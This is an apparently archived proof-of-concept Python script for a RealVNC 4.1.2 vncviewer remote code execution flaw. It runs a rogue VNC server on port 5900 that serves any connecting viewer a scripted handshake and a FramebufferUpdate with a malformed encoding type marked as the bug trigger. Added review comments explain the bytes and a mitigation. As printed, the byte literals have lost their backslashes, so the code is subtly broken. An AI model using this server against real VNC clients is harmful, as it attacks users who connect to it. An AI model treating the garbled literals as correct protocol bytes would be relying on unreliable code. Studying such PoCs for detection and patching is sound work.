
# Title : RealVNC 4.1.2 (vncviewer.exe) RFB Protocol Remote Code Execution PoC
# Published : 2009-02-02
# Author : Andres Luksenberg


#!/usr/bin/env python
# POC: RealVNC 4.1.2 'vncviewer.exe' RFB Protocol Remote Code Execution Vulnerability, BID 30499
#Author: Andres Lopez Luksenberg <polakocai@gmail.com>
#
import socket

# Rogue RFB (VNC) "server": a bare TCP listener that answers every client with
# a fixed, scripted sequence of server-side RFB messages. There is no real
# framebuffer, no authentication, and nothing is parsed from the client --
# each recv() is only echoed to stdout.
#
# NOTE(review): every byte-string literal below is printed without its
# backslashes (e.g. 'x01x01' rather than '\x01\x01'); as listed, the script
# sends those ASCII characters. The per-message comments describe the byte
# layout the literals evidently intend, not what the garbled text would send.
#
# On the wire, the distinguishing features of this PoC are: a "server" that
# announces RFB 003.008, offers only security type None, then names its
# desktop "LinuxVNC: /dev/tty2" and immediately pushes a FramebufferUpdate
# whose rectangle carries the encoding-type value the author marks '#bug'.
# Mitigation is client-side: keep vncviewer patched and reject encoding types
# the client never advertised in SetEncodings.
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind on all interfaces, TCP 5900 (VNC display :0), so any viewer that
# connects to this host's display 0 receives the scripted stream.
serversocket.bind(('', 5900))
serversocket.listen(1)

# Infinite accept loop -- there is no break, so the two close() calls after
# the loop are never reached and the listener lives until the process dies.
while True:
		clientsocket, clientaddres = serversocket.accept()

		# ProtocolVersion: intended bytes are 'RFB 003.008\n' (12 bytes, RFB 3.8).
		data = 'RFB 003.008n'
		clientsocket.sendall(data)

		# Client's ProtocolVersion reply; printed verbatim (Python 2 print statement).
		data_cli = clientsocket.recv(1024)
		print data_cli

		# Security handshake (RFB 3.8): intended '\x01\x01' = one security type
		# offered, type 1 = None, i.e. no authentication at all.
		data = 'x01x01'
		clientsocket.sendall(data)

		# Client's chosen security type.
		data_cli = clientsocket.recv(1024)
		print repr(data_cli)

		# SecurityResult: intended '\x00\x00\x00\x00' = 0 = OK.
		data = 'x00x00x00x00'
		clientsocket.sendall(data)

		# ServerInit, decoding the intended bytes: width 0x02d0 (720), height
		# 0x0177 (375), a 16-byte pixel-format block (8 bpp, depth 8), then
		# name-length 0x13 (19) and the desktop name "LinuxVNC: /dev/tty2"
		# (4c 69 6e 75 78 56 4e 43 3a 20 2f 64 65 76 2f 74 74 79 32). That
		# name is a convenient capture-time indicator for this PoC.
		data = 'x02xd0x01x77x08x08x00x00x00x07x00x07x00x03x00x03x06x00x00x00x00x00x00x13x4cx69x6ex75x78x56x4ex43x3ax20x2fx64x65x76x2fx74x74x79x32'

		clientsocket.sendall(data)

		# Three client messages are read and printed but never interpreted --
		# presumably ClientInit followed by the viewer's SetPixelFormat /
		# SetEncodings / FramebufferUpdateRequest traffic (not verified here).
		data_cli = clientsocket.recv(1024)
		print repr(data_cli)

		data_cli = clientsocket.recv(1024)
		print repr(data_cli)

		data_cli = clientsocket.recv(1024)
		print repr(data_cli)

		# FramebufferUpdate, intended bytes: message type 0, 1 byte padding,
		# number-of-rectangles 0x0003, then the first rectangle header
		# x=0x0003 y=0x0003 w=0x0008 h=0x0007.
		data='x00x00x00x03x00x03x00x03x00x08x00x07'

		# 4-byte encoding-type field for that rectangle, intended 00 00 ff ff
		# (0x0000ffff) -- the value the author flags as the trigger. It is not
		# a standard RFB encoding; a viewer should treat an unadvertised
		# encoding type as a protocol error rather than dispatch on it.
		data = data + 'x00x00xffxff' #bug

		# Rectangle body: a long run of zero bytes followed by the trailing
		# bytes e7 e7 7e 3c 7e e7 e7. The script does not explain the trailer;
		# it is left as the author wrote it.
		data = data + 'x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xe7xe7x7ex3cx7exe7xe7'

		# The accepted socket is never closed inside the loop; each client
		# connection leaks until the process exits.
		clientsocket.sendall(data)

# Unreachable: the while True above never terminates.
clientsocket.close()	
serversocket.close()
